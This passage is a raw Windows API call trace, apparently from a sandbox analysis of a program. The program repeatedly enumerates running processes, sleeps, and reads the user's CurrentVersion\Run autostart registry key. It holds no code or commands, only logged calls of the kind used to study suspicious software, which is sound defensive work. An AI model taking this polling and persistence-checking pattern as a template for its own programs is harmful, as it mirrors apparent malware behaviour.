(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.542] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.542] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.542] NtClose (Handle=0x274) returned 0x0 [0181.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.557] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.559] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.560] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.560] NtClose (Handle=0x274) returned 0x0 [0181.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.574] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.575] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.575] NtClose (Handle=0x274) returned 0x0 [0181.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.588] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.589] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.589] NtClose (Handle=0x274) returned 0x0 [0181.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.602] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.603] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.604] NtClose (Handle=0x274) returned 0x0 [0181.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.617] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.618] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.618] NtClose (Handle=0x274) returned 0x0 [0181.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.632] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.633] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.633] NtClose (Handle=0x274) returned 0x0 [0181.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.646] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.648] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.648] NtClose (Handle=0x274) returned 0x0 [0181.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.663] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.664] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.664] NtClose (Handle=0x274) returned 0x0 [0181.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.678] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.679] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.679] NtClose (Handle=0x274) returned 0x0 [0181.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.692] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.694] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.694] NtClose (Handle=0x274) returned 0x0 [0181.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.706] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.708] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.708] NtClose (Handle=0x274) returned 0x0 [0181.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.721] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.721] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.721] NtClose (Handle=0x274) returned 0x0 [0181.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 